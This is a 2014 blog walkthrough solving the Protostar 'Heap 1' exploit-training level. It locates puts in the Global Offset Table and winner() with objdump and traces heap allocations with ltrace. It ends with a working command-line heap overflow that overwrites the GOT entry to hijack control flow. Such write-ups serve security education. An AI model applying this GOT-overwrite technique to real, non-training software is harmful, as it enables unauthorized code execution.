Tuesday, December 23, 2014

Protostar - Heap #1


This level takes a look at code flow hijacking in data overwrite cases. (link)

Source Code:


Ok, this looks somewhat similar to heap0 except there's no function pointer to overwrite.  Instead, let's try to find the puts entry in the Global Offset Table (GOT), overwrite i2->name with puts's address in the GOT, then have argv[2] be equal to address of winner() so that the call to printf() will trigger winner() instead.

Let's start by finding the address of puts in the GOT:

user@protostar:/opt/protostar/bin$ objdump -TR ./heap1

./heap1:     file format elf32-i386

00000000  w   D  *UND*    00000000              __gmon_start__
00000000      DF *UND*    00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*    00000000  GLIBC_2.0   strcpy
00000000      DF *UND*    00000000  GLIBC_2.0   printf
00000000      DF *UND*    00000000  GLIBC_2.0   time
00000000      DF *UND*    00000000  GLIBC_2.0   malloc
00000000      DF *UND*    00000000  GLIBC_2.0   puts
0804862c g    DO .rodata    00000004  Base        _IO_stdin_used

OFFSET   TYPE              VALUE
0804974c R_386_GLOB_DAT    __gmon_start__
0804975c R_386_JUMP_SLOT   __gmon_start__
08049760 R_386_JUMP_SLOT   __libc_start_main
08049764 R_386_JUMP_SLOT   strcpy
08049768 R_386_JUMP_SLOT   printf
0804976c R_386_JUMP_SLOT   time
08049770 R_386_JUMP_SLOT   malloc
08049774 R_386_JUMP_SLOT   puts

Now let's find our target address (winner):

user@protostar:/opt/protostar/bin$ objdump -t ./heap1  | grep "winner"
08048494 g     F .text    00000025              winner

Now we need to get the addresses of our two structures:
user@protostar:/opt/protostar/bin$ ltrace ./heap1 AAAA BBBB
__libc_start_main(0x80484b9, 3, 0xbffff894, 0x8048580, 0x8048570 <unfinished ...>
malloc(8)                                              = 0x0804a008
malloc(8)                                              = 0x0804a018
malloc(8)                                              = 0x0804a028
malloc(8)                                              = 0x0804a038
strcpy(0x0804a018, "AAAA")                             = 0x0804a018
strcpy(0x0804a038, "BBBB")                             = 0x0804a038
puts("and that's a wrap folks!"and that's a wrap folks!
)                       = 25
+++ exited (status 25) +++

Now, let's trigger the overwrite:

user@protostar:/opt/protostar/bin$ ./heap1 $(python -c "print 'x'*20 + '\x74\x97\x04\x08'") $(python -c "print '\x94\x84\x04\x08'")
and we have a winner @ 1417009928


1 comment: